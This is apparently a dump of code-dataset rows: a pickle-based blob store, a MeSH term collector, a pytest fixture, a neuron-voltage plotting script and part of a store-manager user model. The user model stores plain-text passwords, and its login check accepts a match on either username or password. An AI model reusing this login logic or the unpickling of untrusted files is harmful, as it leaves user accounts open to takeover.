the dataset fetch batches, in the background while the model is training. | 3.185111 | 3 |
blob_store.py | gbinside/python_persisten_objects | 0 | 6616801 | <filename>blob_store.py
import pickle
import struct
import contextlib
# header
# len Q 64 bit unsigned
# additional to skip Q 64 bit unsigned
# deleted ? bool
from tempfile import SpooledTemporaryFile
HEADER_FORMAT = '<QQ?'
HEADER_SIZE = struct.calcsize(HEADER_FORMAT)
@contextlib.contextmanager
def ignored(*exceptions):
try:
yield
except exceptions:
pass
class BlobStore(object):
def __init__(self, fp):
self._fp = fp
self._holes = {ptr: l1 + l2 for ptr, l1, l2, deleted in self.headers() if deleted}
def _append(self, obj):
encoded_obj = pickle.dumps(obj)
length = len(encoded_obj)
self._fp.write(struct.pack(HEADER_FORMAT, length, 0, False))
self._fp.write(encoded_obj)
self._fp.flush()
def add(self, obj):
encoded_obj = pickle.dumps(obj)
length = len(encoded_obj)
ptr, previous_len = self._find_space(length)
self._fp.seek(ptr, 0)
self._fp.write(struct.pack(HEADER_FORMAT, length, previous_len - length, False))
self._fp.write(encoded_obj)
self._fp.flush()
with ignored(KeyError):
del self._holes[ptr]
return ptr
def get(self, ptr):
self._fp.seek(ptr, 0)
length, _, deleted = struct.unpack(HEADER_FORMAT, self._fp.read(HEADER_SIZE))
if deleted:
raise ValueError('object was delete')
obj = pickle.loads(self._fp.read(length))
return obj
def delete(self, ptr):
self._fp.seek(ptr, 0)
length, add, deleted = struct.unpack(HEADER_FORMAT, self._fp.read(HEADER_SIZE))
self._fp.seek(ptr, 0)
self._fp.write(struct.pack(HEADER_FORMAT, length + add, 0, True))
self._fp.flush()
self._holes[ptr] = length + add
def _find_space(self, length):
for ptr, curr_length in self._holes.items():
if curr_length >= length:
return ptr, curr_length
ret = self._fp.seek(0, 2)
if ret is None:
ret = 0
return ret, length
def headers(self):
self._fp.seek(0, 0)
while True:
raw_data = self._fp.read(HEADER_SIZE)
if not raw_data:
break
curr_length, additionals_bytes, deleted = struct.unpack(HEADER_FORMAT, raw_data)
yield self._fp.tell() - HEADER_SIZE, curr_length, additionals_bytes, deleted
self._fp.seek(curr_length + additionals_bytes, 1)
def __iter__(self):
self._fp.seek(0, 0)
while True:
raw_data = self._fp.read(HEADER_SIZE)
if not raw_data:
break
curr_length, additionals_bytes, deleted = struct.unpack(HEADER_FORMAT, raw_data)
if not deleted:
obj = pickle.loads(self._fp.read(curr_length))
yield obj
self._fp.seek(additionals_bytes, 1)
else:
self._fp.seek(curr_length + additionals_bytes, 1)
def items(self):
self._fp.seek(0, 0)
while True:
raw_data = self._fp.read(HEADER_SIZE)
if not raw_data:
break
curr_length, additionals_bytes, deleted = struct.unpack(HEADER_FORMAT, raw_data)
obj = pickle.loads(self._fp.read(curr_length))
yield self._fp.tell() - HEADER_SIZE - curr_length, curr_length, additionals_bytes, deleted, obj
self._fp.seek(additionals_bytes, 1)
def vacuum(self):
with SpooledTemporaryFile() as ftemp:
bstemp = BlobStore(ftemp)
for x in self:
bstemp._append(x)
ftemp.seek(0, 0)
self._fp.seek(0, 0)
for data in iter(lambda: ftemp.read(4096), b''):
self._fp.write(data)
self._fp.truncate()
self._fp.flush()
self._holes.clear()
def main():
open('blobfile', 'wb').close()
with open('blobfile', 'r+b') as blob:
bs = BlobStore(blob)
ptr = bs.add('stringa')
ptr2 = bs.add('stringa2')
ptr3 = bs.add('stringa3')
assert 'stringa' == bs.get(ptr)
assert 'stringa2' == bs.get(ptr2)
assert 'stringa3' == bs.get(ptr3)
bs.delete(ptr2)
try:
bs.get(ptr2)
assert False
except ValueError:
pass
ptr4 = bs.add('4')
assert '4' == bs.get(ptr4)
assert ptr4 < ptr3
for x in bs.items():
print(x)
bs.delete(ptr4)
ptr5 = bs.add('55')
assert '55' == bs.get(ptr5)
assert ptr5 == ptr4
bs.delete(ptr5)
for x in bs.headers():
print(x)
for x in bs:
print(x)
assert 'stringa' in bs
assert '55' not in bs
print('prevacuum')
for x in bs.items():
print(x)
bs.vacuum()
print('postvacuum')
for x in bs.items():
print(x)
if __name__ == "__main__":
main()
| <filename>blob_store.py
import pickle
import struct
import contextlib
# header
# len Q 64 bit unsigned
# additional to skip Q 64 bit unsigned
# deleted ? bool
from tempfile import SpooledTemporaryFile
HEADER_FORMAT = '<QQ?'
HEADER_SIZE = struct.calcsize(HEADER_FORMAT)
@contextlib.contextmanager
def ignored(*exceptions):
try:
yield
except exceptions:
pass
class BlobStore(object):
def __init__(self, fp):
self._fp = fp
self._holes = {ptr: l1 + l2 for ptr, l1, l2, deleted in self.headers() if deleted}
def _append(self, obj):
encoded_obj = pickle.dumps(obj)
length = len(encoded_obj)
self._fp.write(struct.pack(HEADER_FORMAT, length, 0, False))
self._fp.write(encoded_obj)
self._fp.flush()
def add(self, obj):
encoded_obj = pickle.dumps(obj)
length = len(encoded_obj)
ptr, previous_len = self._find_space(length)
self._fp.seek(ptr, 0)
self._fp.write(struct.pack(HEADER_FORMAT, length, previous_len - length, False))
self._fp.write(encoded_obj)
self._fp.flush()
with ignored(KeyError):
del self._holes[ptr]
return ptr
def get(self, ptr):
self._fp.seek(ptr, 0)
length, _, deleted = struct.unpack(HEADER_FORMAT, self._fp.read(HEADER_SIZE))
if deleted:
raise ValueError('object was delete')
obj = pickle.loads(self._fp.read(length))
return obj
def delete(self, ptr):
self._fp.seek(ptr, 0)
length, add, deleted = struct.unpack(HEADER_FORMAT, self._fp.read(HEADER_SIZE))
self._fp.seek(ptr, 0)
self._fp.write(struct.pack(HEADER_FORMAT, length + add, 0, True))
self._fp.flush()
self._holes[ptr] = length + add
def _find_space(self, length):
for ptr, curr_length in self._holes.items():
if curr_length >= length:
return ptr, curr_length
ret = self._fp.seek(0, 2)
if ret is None:
ret = 0
return ret, length
def headers(self):
self._fp.seek(0, 0)
while True:
raw_data = self._fp.read(HEADER_SIZE)
if not raw_data:
break
curr_length, additionals_bytes, deleted = struct.unpack(HEADER_FORMAT, raw_data)
yield self._fp.tell() - HEADER_SIZE, curr_length, additionals_bytes, deleted
self._fp.seek(curr_length + additionals_bytes, 1)
def __iter__(self):
self._fp.seek(0, 0)
while True:
raw_data = self._fp.read(HEADER_SIZE)
if not raw_data:
break
curr_length, additionals_bytes, deleted = struct.unpack(HEADER_FORMAT, raw_data)
if not deleted:
obj = pickle.loads(self._fp.read(curr_length))
yield obj
self._fp.seek(additionals_bytes, 1)
else:
self._fp.seek(curr_length + additionals_bytes, 1)
def items(self):
self._fp.seek(0, 0)
while True:
raw_data = self._fp.read(HEADER_SIZE)
if not raw_data:
break
curr_length, additionals_bytes, deleted = struct.unpack(HEADER_FORMAT, raw_data)
obj = pickle.loads(self._fp.read(curr_length))
yield self._fp.tell() - HEADER_SIZE - curr_length, curr_length, additionals_bytes, deleted, obj
self._fp.seek(additionals_bytes, 1)
def vacuum(self):
with SpooledTemporaryFile() as ftemp:
bstemp = BlobStore(ftemp)
for x in self:
bstemp._append(x)
ftemp.seek(0, 0)
self._fp.seek(0, 0)
for data in iter(lambda: ftemp.read(4096), b''):
self._fp.write(data)
self._fp.truncate()
self._fp.flush()
self._holes.clear()
def main():
open('blobfile', 'wb').close()
with open('blobfile', 'r+b') as blob:
bs = BlobStore(blob)
ptr = bs.add('stringa')
ptr2 = bs.add('stringa2')
ptr3 = bs.add('stringa3')
assert 'stringa' == bs.get(ptr)
assert 'stringa2' == bs.get(ptr2)
assert 'stringa3' == bs.get(ptr3)
bs.delete(ptr2)
try:
bs.get(ptr2)
assert False
except ValueError:
pass
ptr4 = bs.add('4')
assert '4' == bs.get(ptr4)
assert ptr4 < ptr3
for x in bs.items():
print(x)
bs.delete(ptr4)
ptr5 = bs.add('55')
assert '55' == bs.get(ptr5)
assert ptr5 == ptr4
bs.delete(ptr5)
for x in bs.headers():
print(x)
for x in bs:
print(x)
assert 'stringa' in bs
assert '55' not in bs
print('prevacuum')
for x in bs.items():
print(x)
bs.vacuum()
print('postvacuum')
for x in bs.items():
print(x)
if __name__ == "__main__":
main()
| en | 0.928329 | # header # len Q 64 bit unsigned # additional to skip Q 64 bit unsigned # deleted ? bool | 2.383057 | 2 |
biotermhub/inputfilters/mesh.py | OntoGene/BioTermHub_dockerized | 1 | 6616802 | #!/usr/bin/env python3
# coding: utf8
# Author: <NAME>, 2016
'''
Collect MeSH descriptions and supplements ("mesh-{desc,supp}.json.pile").
'''
import json
from collections import namedtuple
from datetime import datetime
from lxml import etree
from termhub.inputfilters._base import IterConceptRecordSet
# These headings for the initial letter of the MeSH Tree numbers are not given
# anymore in the 2016 release.
# Should we still use them?
TREES = {
'A': 'Anatomy',
'B': 'Organisms',
'C': 'Diseases',
'D': 'Chemicals and Drugs',
'E': 'Analytical,Diagnostic and Therapeutic Techniques and Equipment',
'F': 'Psychiatry and Psychology',
'G': 'Phenomena and Processes',
'H': 'Disciplines and Occupations',
'I': 'Anthropology,Education,Sociology and Social Phenomena',
'J': 'Technology,Industry,Agriculture',
'K': 'Humanities',
'L': 'Information Science',
'M': 'Named Groups',
'N': 'Health Care',
'V': 'Publication Characteristics',
'Z': 'Geographicals',
}
DescEntry = namedtuple('DescEntry', 'id pref terms trees')
SuppEntry = namedtuple('SuppEntry', 'id pref terms refs')
YEAR = datetime.now().year
class RecordSet(IterConceptRecordSet):
'''
Record collector for MeSH.
'''
resource = None # Not a fixed field.
entity_type = None # Not a fixed field.
dump_fn = ('mesh-desc.json.pile', 'mesh-supp.json.pile')
remote = tuple('ftp://nlmpubs.nlm.nih.gov/online/mesh/MESH_FILES/xmlmesh/'
'{}{}.gz'.format(level, YEAR) for level in ('desc', 'supp'))
source_ref = 'https://www.nlm.nih.gov/pubs/factsheets/mesh.html'
tree_type_defaults = {
'B': 'organism',
'C': 'disease',
'D': 'chemical',
}
def __init__(self, tree_types=None, mapping=None, **kwargs):
# Do not give mapping to the superclass, since those fields are not
# fixed for MeSH.
super().__init__(**kwargs)
if tree_types is None:
tree_types = self.tree_type_defaults
self._tree_types = tree_types
self._desc_names = self._resource_name_by_tree('desc', tree_types)
self._supp_names = self._resource_name_by_tree('supp', tree_types)
self._resource_mapping = {
name: self.mapping(mapping, 'resource', name)
for name in self.resource_names(tree_types)}
self._entity_type_mapping = {
name: self.mapping(mapping, 'entity_type', name)
for name in self.entity_type_names(tree_types)}
def _iter_concepts(self):
for entry, tree, resource in self._iter_entries():
entity_type = self._entity_type_mapping[self._tree_types[tree]]
resource = self._resource_mapping[resource]
yield entry.id, entry.pref, entry.terms, entity_type, resource
def _iter_entries(self):
'''
Iterate over descriptors and supplementals.
'''
ref_trees = {}
for entry in self._iter_desc():
trees = set(entry.trees)
ref_trees[entry.id] = trees
for tree in trees.intersection(self._tree_types):
resource = self._desc_names[tree]
yield entry, tree, resource
for entry in self._iter_supp():
trees = set(t for id_ in entry.refs for t in ref_trees[id_])
for tree in trees.intersection(self._tree_types):
resource = self._supp_names[tree]
yield entry, tree, resource
def _iter_desc(self):
'''
Iterate over DescriptorRecord entries.
'''
return self._get_json_pile(self.fn[0], DescEntry)
def _iter_supp(self):
'''
Iterate over SupplementalRecord entries.
'''
return self._get_json_pile(self.fn[1], SuppEntry)
@staticmethod
def _get_json_pile(fn, container):
'''
JSON pile: text file with one JSON fragment per line.
'''
with open(fn, encoding='ascii') as f:
for line in f:
entry = container(*json.loads(line))
yield entry
@classmethod
def _prep_desc(cls, stream):
'''
Preprocess DescriptorRecord entries and save them in a JSON pile.
'''
for _, record in etree.iterparse(stream, tag='DescriptorRecord'):
# DescriptorName/String seems to be always the same as
# .//Term[@RecordPreferredTermYN="Y"]/String,
# so it's probably safe to use either as preferred term.
# There's no need to add DescriptorName/String or
# .//ConceptName/String to the terms set,
# as these are all included in the .//Term/String nodes.
line = json.dumps((
record.find('DescriptorUI').text,
record.find('DescriptorName/String').text,
tuple(set(n.text for n in record.iterfind('.//Term/String'))),
[n.text[0] for n in record.iterfind('.//TreeNumber')],
)) + '\n'
record.clear()
yield line.encode('ascii')
@classmethod
def _prep_supp(cls, stream):
'''
Preprocess SupplementalRecord entries and save them in a JSON pile.
'''
for _, record in etree.iterparse(stream, tag='SupplementalRecord'):
line = json.dumps((
record.find('SupplementalRecordUI').text,
record.find('SupplementalRecordName/String').text,
tuple(set(n.text for n in record.iterfind('.//Term/String'))),
[n.text.lstrip('*') # What does the * mean in ref IDs?
for n in record.iterfind('.//DescriptorUI')],
)) + '\n'
record.clear()
yield line.encode('ascii')
@classmethod
def dump_label(cls):
return 'MeSH'
@classmethod
def update_info(cls):
steps = zip(cls.remote, (cls._prep_desc, cls._prep_supp), cls.dump_fn)
return [(r, 'gz', prep, fn) for r, prep, fn in steps]
@classmethod
def resource_names(cls, trees=None):
if trees is None:
trees = cls.tree_type_defaults.keys()
return [name
for s in ('desc', 'supp')
for name in cls._resource_name_by_tree(s, trees).values()]
@staticmethod
def _resource_name_by_tree(subresource, trees):
return {t: 'MeSH {} ({})'.format(subresource, TREES[t])
for t in trees}
@classmethod
def entity_type_names(cls, tree_types=None):
if tree_types is None:
tree_types = cls.tree_type_defaults
return list(tree_types.values())
| #!/usr/bin/env python3
# coding: utf8
# Author: <NAME>, 2016
'''
Collect MeSH descriptions and supplements ("mesh-{desc,supp}.json.pile").
'''
import json
from collections import namedtuple
from datetime import datetime
from lxml import etree
from termhub.inputfilters._base import IterConceptRecordSet
# These headings for the initial letter of the MeSH Tree numbers are not given
# anymore in the 2016 release.
# Should we still use them?
TREES = {
'A': 'Anatomy',
'B': 'Organisms',
'C': 'Diseases',
'D': 'Chemicals and Drugs',
'E': 'Analytical,Diagnostic and Therapeutic Techniques and Equipment',
'F': 'Psychiatry and Psychology',
'G': 'Phenomena and Processes',
'H': 'Disciplines and Occupations',
'I': 'Anthropology,Education,Sociology and Social Phenomena',
'J': 'Technology,Industry,Agriculture',
'K': 'Humanities',
'L': 'Information Science',
'M': 'Named Groups',
'N': 'Health Care',
'V': 'Publication Characteristics',
'Z': 'Geographicals',
}
DescEntry = namedtuple('DescEntry', 'id pref terms trees')
SuppEntry = namedtuple('SuppEntry', 'id pref terms refs')
YEAR = datetime.now().year
class RecordSet(IterConceptRecordSet):
'''
Record collector for MeSH.
'''
resource = None # Not a fixed field.
entity_type = None # Not a fixed field.
dump_fn = ('mesh-desc.json.pile', 'mesh-supp.json.pile')
remote = tuple('ftp://nlmpubs.nlm.nih.gov/online/mesh/MESH_FILES/xmlmesh/'
'{}{}.gz'.format(level, YEAR) for level in ('desc', 'supp'))
source_ref = 'https://www.nlm.nih.gov/pubs/factsheets/mesh.html'
tree_type_defaults = {
'B': 'organism',
'C': 'disease',
'D': 'chemical',
}
def __init__(self, tree_types=None, mapping=None, **kwargs):
# Do not give mapping to the superclass, since those fields are not
# fixed for MeSH.
super().__init__(**kwargs)
if tree_types is None:
tree_types = self.tree_type_defaults
self._tree_types = tree_types
self._desc_names = self._resource_name_by_tree('desc', tree_types)
self._supp_names = self._resource_name_by_tree('supp', tree_types)
self._resource_mapping = {
name: self.mapping(mapping, 'resource', name)
for name in self.resource_names(tree_types)}
self._entity_type_mapping = {
name: self.mapping(mapping, 'entity_type', name)
for name in self.entity_type_names(tree_types)}
def _iter_concepts(self):
for entry, tree, resource in self._iter_entries():
entity_type = self._entity_type_mapping[self._tree_types[tree]]
resource = self._resource_mapping[resource]
yield entry.id, entry.pref, entry.terms, entity_type, resource
def _iter_entries(self):
'''
Iterate over descriptors and supplementals.
'''
ref_trees = {}
for entry in self._iter_desc():
trees = set(entry.trees)
ref_trees[entry.id] = trees
for tree in trees.intersection(self._tree_types):
resource = self._desc_names[tree]
yield entry, tree, resource
for entry in self._iter_supp():
trees = set(t for id_ in entry.refs for t in ref_trees[id_])
for tree in trees.intersection(self._tree_types):
resource = self._supp_names[tree]
yield entry, tree, resource
def _iter_desc(self):
'''
Iterate over DescriptorRecord entries.
'''
return self._get_json_pile(self.fn[0], DescEntry)
def _iter_supp(self):
'''
Iterate over SupplementalRecord entries.
'''
return self._get_json_pile(self.fn[1], SuppEntry)
@staticmethod
def _get_json_pile(fn, container):
'''
JSON pile: text file with one JSON fragment per line.
'''
with open(fn, encoding='ascii') as f:
for line in f:
entry = container(*json.loads(line))
yield entry
@classmethod
def _prep_desc(cls, stream):
'''
Preprocess DescriptorRecord entries and save them in a JSON pile.
'''
for _, record in etree.iterparse(stream, tag='DescriptorRecord'):
# DescriptorName/String seems to be always the same as
# .//Term[@RecordPreferredTermYN="Y"]/String,
# so it's probably safe to use either as preferred term.
# There's no need to add DescriptorName/String or
# .//ConceptName/String to the terms set,
# as these are all included in the .//Term/String nodes.
line = json.dumps((
record.find('DescriptorUI').text,
record.find('DescriptorName/String').text,
tuple(set(n.text for n in record.iterfind('.//Term/String'))),
[n.text[0] for n in record.iterfind('.//TreeNumber')],
)) + '\n'
record.clear()
yield line.encode('ascii')
@classmethod
def _prep_supp(cls, stream):
'''
Preprocess SupplementalRecord entries and save them in a JSON pile.
'''
for _, record in etree.iterparse(stream, tag='SupplementalRecord'):
line = json.dumps((
record.find('SupplementalRecordUI').text,
record.find('SupplementalRecordName/String').text,
tuple(set(n.text for n in record.iterfind('.//Term/String'))),
[n.text.lstrip('*') # What does the * mean in ref IDs?
for n in record.iterfind('.//DescriptorUI')],
)) + '\n'
record.clear()
yield line.encode('ascii')
@classmethod
def dump_label(cls):
return 'MeSH'
@classmethod
def update_info(cls):
steps = zip(cls.remote, (cls._prep_desc, cls._prep_supp), cls.dump_fn)
return [(r, 'gz', prep, fn) for r, prep, fn in steps]
@classmethod
def resource_names(cls, trees=None):
if trees is None:
trees = cls.tree_type_defaults.keys()
return [name
for s in ('desc', 'supp')
for name in cls._resource_name_by_tree(s, trees).values()]
@staticmethod
def _resource_name_by_tree(subresource, trees):
return {t: 'MeSH {} ({})'.format(subresource, TREES[t])
for t in trees}
@classmethod
def entity_type_names(cls, tree_types=None):
if tree_types is None:
tree_types = cls.tree_type_defaults
return list(tree_types.values())
| en | 0.838347 | #!/usr/bin/env python3 # coding: utf8 # Author: <NAME>, 2016 Collect MeSH descriptions and supplements ("mesh-{desc,supp}.json.pile"). # These headings for the initial letter of the MeSH Tree numbers are not given # anymore in the 2016 release. # Should we still use them? Record collector for MeSH. # Not a fixed field. # Not a fixed field. # Do not give mapping to the superclass, since those fields are not # fixed for MeSH. Iterate over descriptors and supplementals. Iterate over DescriptorRecord entries. Iterate over SupplementalRecord entries. JSON pile: text file with one JSON fragment per line. Preprocess DescriptorRecord entries and save them in a JSON pile. # DescriptorName/String seems to be always the same as # .//Term[@RecordPreferredTermYN="Y"]/String, # so it's probably safe to use either as preferred term. # There's no need to add DescriptorName/String or # .//ConceptName/String to the terms set, # as these are all included in the .//Term/String nodes. Preprocess SupplementalRecord entries and save them in a JSON pile. # What does the * mean in ref IDs? | 2.149887 | 2 |
tests/conftest.py | ThiefMaster/logstapo | 7 | 6616803 | <filename>tests/conftest.py<gh_stars>1-10
import pytest
@pytest.fixture
def mock_config(mocker):
def _mock_config(config):
mocker.patch('logstapo.config._ConfigDict.data', config)
return _mock_config
| <filename>tests/conftest.py<gh_stars>1-10
import pytest
@pytest.fixture
def mock_config(mocker):
def _mock_config(config):
mocker.patch('logstapo.config._ConfigDict.data', config)
return _mock_config
| none | 1 | 1.759614 | 2 | |
phase_reset/weak coupling/xpp_to_py.py | helene-todd/M2_thesis_code | 0 | 6616804 | <gh_stars>0
from matplotlib import cm, rcParams
import matplotlib.pyplot as plt
import matplotlib as matplotlib
from matplotlib import patheffects
import numpy as np
import math as math
import random as rand
import os
import csv
rcParams.update({'figure.autolayout': True})
#matplotlib.pyplot.xkcd(scale=.5, length=100, randomness=2)
#rcParams['path.effects'] = [patheffects.withStroke(linewidth=.5)]
c = ['#aa3863', '#3b7d86', '#5443a3']
times_plot1, times_plot2 = [], []
V1_plot1, V2_plot1, V1_plot2, V2_plot2 = [], [], [], []
I_plot1, I_plot2 = [], []
Vth = 1
Vr = 0
fig, ax = plt.subplots(2, 2, figsize=(16,6), sharey='row', sharex='col')
k = 0
with open('phase_reset.dat', newline='') as file:
datareader = csv.reader(file, delimiter=' ')
for row in datareader:
if float(row[0]) >= 0 and float(row[0]) <= 25 and k%20 == 0 :
times_plot1.append(float(row[0]))
V1_plot1.append(float(row[1]))
V2_plot1.append(float(row[2]))
I_plot1.append(float(row[3]))
if float(row[0]) >= 885 and float(row[0]) <= 910 and k%20 == 0 :
times_plot2.append(float(row[0]))
V1_plot2.append(float(row[1]))
V2_plot2.append(float(row[2]))
I_plot2.append(float(row[3]))
k += 1
# A spike occurs iff there was a reset
for i in range(1,len(V1_plot1)) :
if abs(V1_plot1[i]-V1_plot1[i-1]) > (Vth-Vr)/2 and V1_plot1[i] < 1 and V1_plot1[i-1] < 1:
V1_plot1.insert(i, Vth+0.5)
V2_plot1.insert(i, V2_plot1[i])
I_plot1.insert(i, I_plot1[i])
times_plot1.insert(i, times_plot1[i])
if abs(V2_plot1[i]-V2_plot1[i-1]) > (Vth-Vr)/2 and V2_plot1[i] < 1 and V2_plot1[i-1] < 1:
V2_plot1.insert(i, Vth+0.5)
V1_plot1.insert(i, V1_plot1[i])
I_plot1.insert(i, I_plot1[i])
times_plot1.insert(i, times_plot1[i])
for i in range(1,len(V1_plot2)) :
if abs(V1_plot2[i]-V1_plot2[i-1]) > (Vth-Vr)/2 and V1_plot2[i] < 1 and V1_plot2[i-1] < 1:
V1_plot2.insert(i, Vth+0.5)
V2_plot2.insert(i, V2_plot2[i])
I_plot2.insert(i, I_plot2[i])
times_plot2.insert(i, times_plot2[i])
if abs(V2_plot2[i]-V2_plot2[i-1]) > (Vth-Vr)/2 and V2_plot2[i] < 1 and V2_plot2[i-1] < 1:
V2_plot2.insert(i, Vth+0.5)
V1_plot2.insert(i, V1_plot2[i])
I_plot2.insert(i, I_plot2[i])
times_plot2.insert(i, times_plot2[i])
ax[1, 0].plot(times_plot1, V1_plot1, alpha=1, color=c[0], linestyle='-') #alpha=0.75
ax[1, 0].plot(times_plot1, V2_plot1, alpha=1, color=c[1], linestyle='-') #alpha=0.75
ax[0, 0].plot(times_plot1, I_plot1, alpha=1, color=c[2], linestyle='-') #alpha=0.75
ax[1, 1].plot(times_plot2, V1_plot2, alpha=1, color=c[0], linestyle='-', label='$V_1$') #alpha=0.75
ax[1, 1].plot(times_plot2, V2_plot2, alpha=1, color=c[1], linestyle='-', label='$V_2$') #alpha=0.75
ax[0, 1].plot(times_plot2, I_plot2, alpha=1, color=c[2], linestyle='-', label='$I$') #alpha=0.75
ax[1, 0].set_xlabel('Time ($10^{-2}$ seconds)', size=14)
ax[1, 1].set_xlabel('Time ($10^{-2}$ seconds)', size=14)
ax[1, 0].set_ylabel('Voltage $V_k, k \in \{1,2\}$', size=14)
ax[0, 0].set_ylabel('Current $I$', size=14)
ax[0, 0].set_ylim(0, 20)
fig.suptitle('System is perturbed by a pulse current', size=18)
ax[0,1].legend(loc='upper right', bbox_to_anchor=(1, 0.95), fontsize=13)
ax[1,1].legend(loc='upper right', bbox_to_anchor=(1, 0.95), fontsize=13)
plt.tight_layout()
plt.savefig('from_as_to_as.svg')
#plt.show()
| from matplotlib import cm, rcParams
import matplotlib.pyplot as plt
import matplotlib as matplotlib
from matplotlib import patheffects
import numpy as np
import math as math
import random as rand
import os
import csv
rcParams.update({'figure.autolayout': True})
#matplotlib.pyplot.xkcd(scale=.5, length=100, randomness=2)
#rcParams['path.effects'] = [patheffects.withStroke(linewidth=.5)]
c = ['#aa3863', '#3b7d86', '#5443a3']
times_plot1, times_plot2 = [], []
V1_plot1, V2_plot1, V1_plot2, V2_plot2 = [], [], [], []
I_plot1, I_plot2 = [], []
Vth = 1
Vr = 0
fig, ax = plt.subplots(2, 2, figsize=(16,6), sharey='row', sharex='col')
k = 0
with open('phase_reset.dat', newline='') as file:
datareader = csv.reader(file, delimiter=' ')
for row in datareader:
if float(row[0]) >= 0 and float(row[0]) <= 25 and k%20 == 0 :
times_plot1.append(float(row[0]))
V1_plot1.append(float(row[1]))
V2_plot1.append(float(row[2]))
I_plot1.append(float(row[3]))
if float(row[0]) >= 885 and float(row[0]) <= 910 and k%20 == 0 :
times_plot2.append(float(row[0]))
V1_plot2.append(float(row[1]))
V2_plot2.append(float(row[2]))
I_plot2.append(float(row[3]))
k += 1
# A spike occurs iff there was a reset
for i in range(1,len(V1_plot1)) :
if abs(V1_plot1[i]-V1_plot1[i-1]) > (Vth-Vr)/2 and V1_plot1[i] < 1 and V1_plot1[i-1] < 1:
V1_plot1.insert(i, Vth+0.5)
V2_plot1.insert(i, V2_plot1[i])
I_plot1.insert(i, I_plot1[i])
times_plot1.insert(i, times_plot1[i])
if abs(V2_plot1[i]-V2_plot1[i-1]) > (Vth-Vr)/2 and V2_plot1[i] < 1 and V2_plot1[i-1] < 1:
V2_plot1.insert(i, Vth+0.5)
V1_plot1.insert(i, V1_plot1[i])
I_plot1.insert(i, I_plot1[i])
times_plot1.insert(i, times_plot1[i])
for i in range(1,len(V1_plot2)) :
if abs(V1_plot2[i]-V1_plot2[i-1]) > (Vth-Vr)/2 and V1_plot2[i] < 1 and V1_plot2[i-1] < 1:
V1_plot2.insert(i, Vth+0.5)
V2_plot2.insert(i, V2_plot2[i])
I_plot2.insert(i, I_plot2[i])
times_plot2.insert(i, times_plot2[i])
if abs(V2_plot2[i]-V2_plot2[i-1]) > (Vth-Vr)/2 and V2_plot2[i] < 1 and V2_plot2[i-1] < 1:
V2_plot2.insert(i, Vth+0.5)
V1_plot2.insert(i, V1_plot2[i])
I_plot2.insert(i, I_plot2[i])
times_plot2.insert(i, times_plot2[i])
ax[1, 0].plot(times_plot1, V1_plot1, alpha=1, color=c[0], linestyle='-') #alpha=0.75
ax[1, 0].plot(times_plot1, V2_plot1, alpha=1, color=c[1], linestyle='-') #alpha=0.75
ax[0, 0].plot(times_plot1, I_plot1, alpha=1, color=c[2], linestyle='-') #alpha=0.75
ax[1, 1].plot(times_plot2, V1_plot2, alpha=1, color=c[0], linestyle='-', label='$V_1$') #alpha=0.75
ax[1, 1].plot(times_plot2, V2_plot2, alpha=1, color=c[1], linestyle='-', label='$V_2$') #alpha=0.75
ax[0, 1].plot(times_plot2, I_plot2, alpha=1, color=c[2], linestyle='-', label='$I$') #alpha=0.75
ax[1, 0].set_xlabel('Time ($10^{-2}$ seconds)', size=14)
ax[1, 1].set_xlabel('Time ($10^{-2}$ seconds)', size=14)
ax[1, 0].set_ylabel('Voltage $V_k, k \in \{1,2\}$', size=14)
ax[0, 0].set_ylabel('Current $I$', size=14)
ax[0, 0].set_ylim(0, 20)
fig.suptitle('System is perturbed by a pulse current', size=18)
ax[0,1].legend(loc='upper right', bbox_to_anchor=(1, 0.95), fontsize=13)
ax[1,1].legend(loc='upper right', bbox_to_anchor=(1, 0.95), fontsize=13)
plt.tight_layout()
plt.savefig('from_as_to_as.svg')
#plt.show() | en | 0.707234 | #matplotlib.pyplot.xkcd(scale=.5, length=100, randomness=2) #rcParams['path.effects'] = [patheffects.withStroke(linewidth=.5)] # A spike occurs iff there was a reset #alpha=0.75 #alpha=0.75 #alpha=0.75 #alpha=0.75 #alpha=0.75 #alpha=0.75 #plt.show() | 2.148832 | 2 |
app/version1/users/models.py | SimonAwiti/Store-manager-app-endpoints | 0 | 6616805 | <reponame>SimonAwiti/Store-manager-app-endpoints
"""users data structures"""
import re
import datetime
"""defining global variables"""
users = [{
"user_id":0,
"email": "<EMAIL>",
"username": "administrator",
"password": "<PASSWORD>",
"role": "admin"
}]
user_id = 1
class User:
def __init__(self):
"""initializing user constructor"""
self.email = ""
self.username = ""
self.password = ""
self.role = ""
@staticmethod
def validate_details(details):
"""checks if the user details are relevant before registering"""
if not details:
return "Please enter data for registration"
#if bool(re.search(r'@', details["email"])) is False:
#return "Your email should have an @ in it"
for user in range(len(users)):
if users[user]["email"] == details["email"]:
return "Email already in use, register with another email"
if details["role"] != "admin" and details["role"] != "attendant":
return "You can only register as an admin or attendant"
return True
def add_new_user(self, details):
"""registering a new user"""
# global variable
global user_id
# check details for data
if not details:
return "Please enter information for registration"
# check validity of data
if self.validate_details(details) is True:
users.append({
"user_id": user_id,
"email": self.email,
"username": self.username,
"password": self.password,
"role": self.role
})
user_id += 1
return "User added Successfully!"
return "Ensure that the details are relevant before adding a user!"
def get_users(self):
"""get all users"""
if not users:
return "There are no users registered!"
return users
def get_one_user(self, user_id):
"""fetch a specific user"""
if isinstance(user_id, int) is False:
return "User Id should be a number"
for user in range(len(users)):
if user_id != users[user]["user_id"]:
continue
return users[user]
def validate_user(self, details):
"""validate user details while loging in"""
if not details:
return "Please enter data for registration"
if not users:
return "No registered users"
for user in range(len(users)):
if users[user]['username'] != details["username"] and users[user]['password'] != details["password"]:
continue
return "Login Successful!"
def edit_user_role(self, user_id, role):
"""Admin changes attendant role to admin"""
if not users:
return "No registered users"
if isinstance(user_id, int) is False:
return "User Id should be a number"
for user in range(len(users)):
if user_id != users[user]["user_id"]:
continue
user["role"] = "administrator"
return "Attendant was promoted to admin"
| """users data structures"""
import re
import datetime
"""defining global variables"""
users = [{
"user_id":0,
"email": "<EMAIL>",
"username": "administrator",
"password": "<PASSWORD>",
"role": "admin"
}]
user_id = 1
class User:
def __init__(self):
"""initializing user constructor"""
self.email = ""
self.username = ""
self.password = ""
self.role = ""
@staticmethod
def validate_details(details):
"""checks if the user details are relevant before registering"""
if not details:
return "Please enter data for registration"
#if bool(re.search(r'@', details["email"])) is False:
#return "Your email should have an @ in it"
for user in range(len(users)):
if users[user]["email"] == details["email"]:
return "Email already in use, register with another email"
if details["role"] != "admin" and details["role"] != "attendant":
return "You can only register as an admin or attendant"
return True
def add_new_user(self, details):
"""registering a new user"""
# global variable
global user_id
# check details for data
if not details:
return "Please enter information for registration"
